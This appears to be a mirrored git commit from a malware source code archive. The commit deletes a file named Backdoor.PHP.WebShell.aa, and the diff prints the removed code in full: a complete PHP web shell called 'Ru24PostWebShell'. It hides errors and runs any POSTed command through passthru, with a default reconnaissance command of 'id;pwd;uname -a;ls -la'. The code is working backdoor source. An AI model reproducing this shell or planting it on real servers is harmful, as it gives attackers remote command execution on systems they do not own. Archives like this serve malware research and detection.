mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-31 06:17:26 +00:00
Delete Backdoor.PHP.WebShell.aa
na
This commit is contained in:
parent
a3948d3554
commit
3121aafc0e
@ -1,23 +0,0 @@
|
|||||||
<?php
|
|
||||||
/*
|
|
||||||
Ru24PostWebShell
|
|
||||||
Writed by DreAmeRz
|
|
||||||
|
|
||||||
http://www.ru24-team.net
|
|
||||||
*/
|
|
||||||
error_reporting(0);
|
|
||||||
$function=passthru; // system, exec, cmd
|
|
||||||
echo "<html>
|
|
||||||
<head>
|
|
||||||
<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
|
|
||||||
<meta http-equiv='pragma' content='no-cache'>
|
|
||||||
</head><body>";
|
|
||||||
echo "<form method=post>";
|
|
||||||
echo "<input type=text name=cmd size=85>";
|
|
||||||
echo "</form>";
|
|
||||||
echo "<pre>";
|
|
||||||
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
|
|
||||||
echo "".$function($_POST['cmd'])."</pre></body></html>";
|
|
||||||
|
|
||||||
|
|
||||||
?>
|
|
Loading…
Reference in New Issue
Block a user